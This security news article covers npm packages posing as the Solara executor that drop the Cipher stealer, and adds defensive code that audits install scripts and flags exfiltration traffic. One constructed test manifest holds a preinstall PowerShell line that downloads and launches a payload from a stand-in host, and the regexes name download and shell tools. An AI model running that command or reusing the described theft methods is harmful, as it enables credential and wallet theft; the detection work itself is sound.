Article Title:
Malicious npm Packages Masquerade as Solara Executor to Exploit Discord, Browsers, and Cryptocurrency Wallets
In a recent and sophisticated supply chain attack, cybercriminals have infiltrated the npm ecosystem by disguising malicious packages as legitimate tools, specifically targeting Discord users, web browsers, and cryptocurrency wallets. This campaign, identified by JFrog security researchers Guy Korolevski and Meitar Palas on March 12, 2026, involves two deceptive npm packages: `bluelite-bot-manager` and `test-logsmodule-v-zisko`. These packages deliver a Windows executable named `solara 1.0.0.exe` or `solara 1.0.1.exe`, which functions as a dropper for the Cipher information-stealing malware.
Mechanism of Attack
Upon installation, the malicious npm packages run an npm lifecycle script (`preinstall`) that silently downloads the `solara` executable from a Dropbox-hosted URL. Because lifecycle scripts run automatically as part of `npm install`, no user interaction is required, which makes the attack particularly insidious. The `solara` executable conceals a 321MB archive containing obfuscated JavaScript, a full Node.js runtime, and an embedded Python script. Bundling its own runtime lets the malware run on the victim's machine regardless of what is already installed there, with no further action required from the attacker.
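The install-time hook is the first place a defender can look. The following is an added example (not code from the JFrog report or from the malicious packages) that audits a `package.json` for install-time lifecycle scripts containing download or execution indicators, and can walk a `node_modules` tree to do the same. The two sample manifests are constructed: `example-native-addon` stands in for a legitimate package that compiles a native module, and `example-dropper` mimics the behaviour described above without reusing the real package names or URLs.

```javascript
// Added example: flag npm lifecycle scripts that fetch or launch something at
// install time. Heuristic, not a complete scanner; extend the patterns for
// your environment.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'preprepare', 'postprepare'];

// Each indicator is a name plus a regex over the script command text.
const INDICATORS = [
  { name: 'network-fetch', re: /\b(curl|wget|Invoke-WebRequest|iwr|bitsadmin|certutil\s+-urlcache|https?:\/\/)/i },
  { name: 'shell-launch',  re: /\b(powershell|cmd(\.exe)?\s*\/c|Start-Process|start\s+\S+\.exe)\b|\.exe\b/i },
  { name: 'inline-eval',   re: /\b(node\s+-e|eval\(|base64\s*-d|FromBase64String)\b/i },
];

// Audit one parsed package.json object; returns one finding per suspicious hook.
function auditPackage(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const hits = INDICATORS.filter(ind => ind.re.test(cmd)).map(ind => ind.name);
    if (hits.length) findings.push({ pkg: pkg.name, version: pkg.version, hook, command: cmd, indicators: hits });
  }
  return findings;
}

// Walk a node_modules directory and audit every package.json found.
// Usage: auditNodeModules('./node_modules')
function auditNodeModules(dir) {
  const fs = require('node:fs');
  const path = require('node:path');
  const findings = [];
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    if (!entry.isDirectory()) continue;
    const sub = path.join(dir, entry.name);
    if (entry.name.startsWith('@')) { findings.push(...auditNodeModules(sub)); continue; }
    const manifest = path.join(sub, 'package.json');
    if (fs.existsSync(manifest)) {
      try { findings.push(...auditPackage(JSON.parse(fs.readFileSync(manifest, 'utf8')))); } catch (e) { /* unreadable manifest; skip */ }
    }
    const nested = path.join(sub, 'node_modules');
    if (fs.existsSync(nested)) findings.push(...auditNodeModules(nested));
  }
  return findings;
}

// Constructed sample manifests (not the real packages from the report).
const SAMPLE_BENIGN = {
  name: 'example-native-addon', version: '2.1.0',
  scripts: { postinstall: 'node-gyp rebuild', test: 'mocha' },
};
const SAMPLE_DROPPER = {
  name: 'example-dropper', version: '1.0.0',
  scripts: {
    preinstall: 'powershell -NoProfile -c "Invoke-WebRequest https://example.invalid/payload.exe -OutFile payload.exe; Start-Process payload.exe"',
  },
};

console.log(JSON.stringify(auditPackage(SAMPLE_BENIGN)));   // []
console.log(JSON.stringify(auditPackage(SAMPLE_DROPPER)));  // one preinstall finding
```

A cheaper preventive control is to stop lifecycle scripts from running at all during CI installs (`npm ci --ignore-scripts`, or `npm config set ignore-scripts true`) and then allow-list the handful of packages, typically native addons, that genuinely need a `postinstall` step; this example is meant to tell those two cases apart during review.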
Notably, the `solara` executable was flagged by only one antivirus engine on VirusTotal, because static and heuristic scanners analyzed the clean outer layer of the dropper rather than the archive hidden inside it.
Targeting Discord Users
The Cipher malware aggressively targets Discord by extracting stored session tokens from LevelDB databases across all installed Discord clients and Chromium-based browsers. It then validates each token against Discord’s live API.
For systems running BetterDiscord, the malware patches the application’s core `index.js` file to disable its built-in webhook protection, ensuring that all stolen data can be transmitted to the attacker’s Discord webhook without interference.
On the official Discord desktop client, a secondary JavaScript payload is downloaded from an active GitHub repository and injected directly into the application. The injected script forces the user to log out and then captures their email, password, two-factor authentication codes, and payment card details when they log back in. It also modifies Discord's startup files so that it persists across reboots. Additionally, it contains a routine, not activated in this campaign, that tricks users into changing their own account email address, with prompts localized into 13 languages.
Exfiltration from Browsers and Cryptocurrency Wallets
The malware employs a dual approach to extract browser credentials. The JavaScript component uses Windows Data Protection API (DPAPI) decryption libraries to recover the DPAPI-protected master encryption key stored in each browser's Local State file, then uses that key to decrypt the saved passwords it reads from the Login Data SQLite database. Targeted browsers include Chrome, Brave, Edge, Opera, and Yandex.
Simultaneously, the embedded Python script (a Python interpreter is silently downloaded and installed if one is not already present) targets a broader range of browsers, including Firefox, Vivaldi, CocCoc, and QQ Browser. This script extracts cookies, credit card information, autofill data, bookmarks, and full browsing history.
The malware also scans the system for cryptocurrency wallet directories associated with Bitcoin, Ethereum, Exodus, Electrum, Atomic Wallet, and others. It copies their contents to a staging folder disguised as a Windows system service before attempting to decrypt the Exodus wallet seed file.
All stolen data is compressed into a ZIP archive and uploaded to Gofile, with a fallback command-and-control server used if that upload fails.
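The network behaviour described in the sections above (a dropper fetched from Dropbox, Discord tokens validated against the live API and data posted to a Discord webhook, and a bulk upload to Gofile) is visible on the wire from the wrong process. The following added example (not from the JFrog report) applies those heuristics to constructed egress-log lines in a simple JSON-per-line format. The process names, paths and hosts in the samples are constructed; the Dropbox and Gofile domain suffixes and the `discord.com/api/webhooks/` prefix are assumed to be representative and should be replaced with your own proxy's observations.

```javascript
// Added example: heuristic detection of the stealer's egress pattern over
// constructed log lines. Each line is JSON: {ts, proc, host, path?, method, bytes_out?}.
const BROWSERS = new Set(['chrome.exe', 'msedge.exe', 'firefox.exe', 'brave.exe', 'opera.exe', 'vivaldi.exe']);
const DISCORD_CLIENTS = new Set(['discord.exe', 'discordcanary.exe', 'discordptb.exe']);
// Staging/exfiltration services named in the report; subdomains matched by suffix (assumed domains).
const FILE_SHARE_SUFFIXES = ['dropbox.com', 'dropboxusercontent.com', 'gofile.io'];
const BULK_UPLOAD_BYTES = 1000000; // threshold for calling a POST a bulk upload

function hostMatches(host, suffixes) {
  const h = host.toLowerCase();
  return suffixes.some(s => h === s || h.endsWith('.' + s));
}

// Return the list of reasons an event looks like stealer activity (empty if none).
function classify(ev) {
  const proc = String(ev.proc || '').toLowerCase();
  const host = String(ev.host || '').toLowerCase();
  const path = ev.path || '/';
  const isBrowser = BROWSERS.has(proc);
  const isDiscord = DISCORD_CLIENTS.has(proc);
  const reasons = [];

  // The dropper is delivered as "solara <version>.exe"; match the image name.
  if (proc.includes('solara')) reasons.push('process-name-matches-dropper');

  // Browsers legitimately talk to Dropbox/Gofile; node.exe or a random .exe does not.
  if (!isBrowser && hostMatches(host, FILE_SHARE_SUFFIXES)) {
    const bulk = ev.method === 'POST' && Number(ev.bytes_out) > BULK_UPLOAD_BYTES;
    reasons.push(bulk ? 'bulk-upload-to-file-share' : 'file-share-access-from-non-browser');
  }

  // Discord API traffic from anything other than a browser or the Discord client
  // matches token validation; a webhook POST from a non-browser matches exfiltration.
  if (host === 'discord.com' && path.startsWith('/api/')) {
    if (path.startsWith('/api/webhooks/') && ev.method === 'POST' && !isBrowser) {
      reasons.push('webhook-post-from-non-browser');
    } else if (!isBrowser && !isDiscord) {
      reasons.push('discord-api-from-unexpected-process');
    }
  }
  return reasons;
}

// Run classify() over raw log lines; unparsable lines are skipped.
function detectExfil(lines) {
  const alerts = [];
  lines.forEach((line, i) => {
    let ev;
    try { ev = JSON.parse(line); } catch (e) { return; }
    const reasons = classify(ev);
    if (reasons.length) alerts.push({ line: i + 1, proc: ev.proc, host: ev.host, reasons });
  });
  return alerts;
}

// Constructed sample log (not real telemetry). Lines 2, 4, 5, 6 and 7 should alert.
const SAMPLE_LOG = [
  '{"ts":"2026-03-12T10:00:01Z","proc":"chrome.exe","host":"www.dropbox.com","method":"GET","bytes_out":1200}',
  '{"ts":"2026-03-12T10:00:05Z","proc":"node.exe","host":"www.dropbox.com","method":"GET","bytes_out":800}',
  '{"ts":"2026-03-12T10:01:10Z","proc":"Discord.exe","host":"discord.com","path":"/api/v9/users/@me","method":"GET"}',
  '{"ts":"2026-03-12T10:01:12Z","proc":"node.exe","host":"discord.com","path":"/api/v9/users/@me","method":"GET"}',
  '{"ts":"2026-03-12T10:01:15Z","proc":"node.exe","host":"discord.com","path":"/api/webhooks/000000/constructed","method":"POST","bytes_out":4096}',
  '{"ts":"2026-03-12T10:02:00Z","proc":"node.exe","host":"store1.gofile.io","method":"POST","bytes_out":48000000}',
  '{"ts":"2026-03-12T10:02:30Z","proc":"solara 1.0.0.exe","host":"github.com","method":"GET","bytes_out":512}',
];

console.log(JSON.stringify(detectExfil(SAMPLE_LOG), null, 1));
```

The rules are deliberately keyed on process identity rather than on a static blocklist of hosts, because the report's infrastructure (Dropbox, GitHub, Gofile) is all legitimate services that browsers contact every day; the anomaly is `node.exe` or an unknown executable doing it.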
Implications and Recommendations
This attack underscores the growing sophistication of supply chain attacks targeting the npm ecosystem. By masquerading as legitimate tools, malicious packages can infiltrate development environments, leading to widespread data breaches and financial losses.
Developers and organizations are advised to exercise caution when incorporating new npm packages into their projects. Concretely: review a package's lifecycle scripts (`preinstall`, `install`, `postinstall`) before adopting it, install with `--ignore-scripts` where the build allows it, pin dependencies through a lockfile, and treat an install that downloads or launches an executable as a red flag. Strict code review, verification of package authenticity, and monitoring for unusual network activity from development machines all help mitigate the risk of such attacks.
Additionally, users should regularly update their software and employ robust security measures, such as multi-factor authentication and endpoint protection solutions, to safeguard against potential threats.